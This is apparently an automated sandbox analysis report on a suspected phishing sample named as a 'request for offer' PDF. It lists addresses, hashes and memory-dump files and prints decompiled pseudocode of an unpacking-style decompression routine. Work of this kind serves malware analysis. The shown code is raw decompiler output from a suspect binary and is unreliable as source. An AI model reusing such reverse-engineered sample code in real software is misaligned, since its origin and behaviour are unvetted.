0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00406f49
0x00406f46
0x00000000
0x00406c9b

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406BE3 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406BE3() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
